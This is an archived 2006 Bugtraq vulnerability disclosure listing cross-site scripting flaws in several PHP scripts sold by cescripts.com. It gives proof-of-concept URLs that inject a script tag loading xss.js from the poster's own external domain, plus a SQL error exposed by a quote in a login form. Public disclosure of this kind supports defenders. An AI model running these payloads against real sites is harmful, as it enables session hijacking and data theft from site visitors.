Bugtraq mailing list archives
cescripts.com - XSS
From: luny () youfucktard com
Date: 11 Jun 2006 21:03:35 -0000
Cescripts.com Scripts Below are scripts I tested from the site cescripts.com. This site seels to be selling canned scripts, full of errors. Anyways, take a look: Car Classifieds Homepage: http://www.cescripts.com/ effected files: index.php XSS Vulnerabilities PoC: Viewing a car: http://www.example.com/car_classifieds/listings/index.php?pag=car_view&car_id=32&offset=0&ord=1&make_id=63'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT> The Car listings: http://www.example.com/car_classifieds/listings/index.php?pag=car_list&ord=1&make_id=63'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT> Screenshots: http://www.youfucktard.com/xsp/car1.jpg http://www.youfucktard.com/xsp/car2.jpg http://www.youfucktard.com/xsp/car3.jpg http://www.youfucktard.com/xsp/car4.jpg -------------------------------------------------- Event Registration ALL VERSIONS Effected files: view-event-details.php event-registration.php view-event-details.php XSS Vuln: http://www.example.com/rsvp3/view-event-details.php?event_id=74'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT> Event-registration-details.php XSS Vuln: http://www.example.com/rsvp3/event-registration.php?select_events=74'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT>&submit=Register Screenshots: http://www.youfucktard.com/xsp/event1.jpg http://www.youfucktard.com/xsp/event2.jpg ------------------------------------------------ Fast Menu Restaurant Ordering v1.0 Effected files: index.php XSS Vuln PoC on sel_menu variable: http://www.example.com/fastmenu/index.php?pag=gift_certificate&sel_menu=5'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT> Screenshots: http://www.youfucktard.com/xsp/frest1.jpg http://www.youfucktard.com/xsp/frest2.jpg DB Query error msg upon using sql injection of ' to log in: Error:db::query() failed.ERROR MESSAGE IS: Failed to run Query:SELECT member_id, first_name, last_name FROM member WHERE password='\\'\\'' AND username='\\'\\'' You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' AND username='\\'\\''' at line 3 ------------------------------------------------- Home Rental Script ALL VERSIONS Effected files: index.php XSS Vuln via sel_menu variable: This has got to be the worst i've seen yet of this kind. The text is everywhere! I think I counted about 20 popups, no joke. http://www.example.com/home_rental/index.php?pag=list_properties&act=basket-add&id=17&type=room&ofs=0&day=11&month=6&year=2006&night=1&hotel_id=&show=&sel_menu='>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT> Screenshots: http://www.youfucktard.com/xsp/cereal1.jpg http://www.youfucktard.com/xsp/cereal2.jpg http://www.youfucktard.com/xsp/cereal3.jpg --------------------------------------------------- There were a ton of other scripts on the site, but I got tired of testing canned scripts =(
Current thread:
- cescripts.com - XSS luny (Jun 12)